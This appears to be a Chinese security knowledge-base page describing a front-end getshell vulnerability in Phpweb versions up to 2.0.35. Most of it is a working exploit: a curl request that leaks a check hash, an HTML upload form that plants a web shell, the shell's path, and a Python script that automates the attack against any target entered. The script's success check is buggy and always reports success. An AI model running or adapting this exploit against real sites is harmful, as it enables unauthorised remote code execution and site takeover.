menu arrow_back 湛蓝安全空间 |狂野湛蓝,暴躁每天 chevron_right ... chevron_right 105-PHPWeb chevron_right 001-Phpweb 前台getshell.md
  • home 首页
  • brightness_4 暗黑模式
    • cloud
    xLIYhHS7e34ez7Ma
    cloud
    湛蓝安全
    code
    Github
    001-Phpweb 前台getshell.md
    2.69 KB / 2021-07-17 00:01:26
        # Phpweb 前台getshell

### 一、漏洞简介

漏洞影响文件:/base/post.php /base/appfile.php /base/appplue.php /base/appborder.php

### 二、漏洞影响

Phpweb<=2.0.35

### 三、复现过程

1.首先要获取加密前的Md5值,用于文件较检,通过Post提交数据来获取!


```bash
curl "http://website/base/post.php" -H "act=appcode"
```

![](images/15893359782266.png)



```
ac34c64cdb405eff881efc5476a64761 ##这个就是初始值
```

2.获取加密后得md5值

然后将初始值md5加密`(ac34c64cdb405eff881efc5476a64761 + “a”)`

得到加密后的MD5值!


```
e10adc3949ba59abbe56e057f20f883e ##这个就是加密后的md5值(终值)!
```

3.Getsehll exp:


```html
<html>
<body>
<form action="http://0-sec.org/base/appfile.php" method="post" enctype="multipart/form-data">
<label for="file">Filename:</label>
<input type="file" name="file" id="file" />
<input type="text" name="t" value="a" />
<input type="text" name="m" value="25a824696cb75a44aabd05a08070789f" />
<input type="text" name="act" value="upload" />
<input type="text" name="r_size" value="14" />
<br />
<input type="submit" name="submit" value="getshell" />
</form>
</body>
</html>
```

![](images/15893360110226.png)


然后…Getshell!

![](images/15893360166500.png)


当出现OK两个大字时,说明你成功了!!!

上传的shell路径是


```
http://url/effect/source/bg/shell名称.php
```

![](images/15893360315738.png)


### 工具编写

Python exp[Python3]:


```python
# -*- coding: UTF-8 -*- #
import os
import requests
import hashlib

bdlj = os.getcwd()
headers = open(bdlj+"\headers.txt",'r')
headerss = headers.read()
print('\b')

ur = input("请输入目标网址:")
requrl =  ur + '/base/post.php'
reqdata = {"act":"appcode"}
r = requests.post(requrl,data=reqdata)
cz=r.text[2:34]
print ('初值:' + cz)

cz=r.text[2:34]+"a"
m = hashlib.md5()
b = cz.encode(encoding='utf-8')
m.update(b)
zz = m.hexdigest()
print ('终值:' + zz)

infile = open(bdlj + "\datas.txt", "r",encoding='utf-8')
outfile = open(bdlj + "\datah.txt", "w",encoding='utf-8')
for line in infile:
      outfile.write(line.replace('156as1f56safasfasfa', zz))
infile.close()
outfile.close()
datas = open(bdlj+"\datah.txt",'r')
datass = datas.read()

gs = requests.post(ur + '/base/appfile.php',data=datass,headers={'Content-Type':headerss})
gs.encoding = 'utf-8'
print (gs.text)

if {gs.text == "OK"}:
    print ("Getshell成功! Shell:" + ur + "/effect/source/bg/mstir.php")
else:
    print ("Getsehll失败!")
```

整包下载地址:https://github.com/ianxtianxt/Phpweb-Getshell-py

使用请下载整包,否则会缺少协议头和data数据!

使用教程:

![](images/15893360541589.png)


**参考链接**

https://m4tir.github.io/Phpweb-Reception-Getshell
    links
    file_download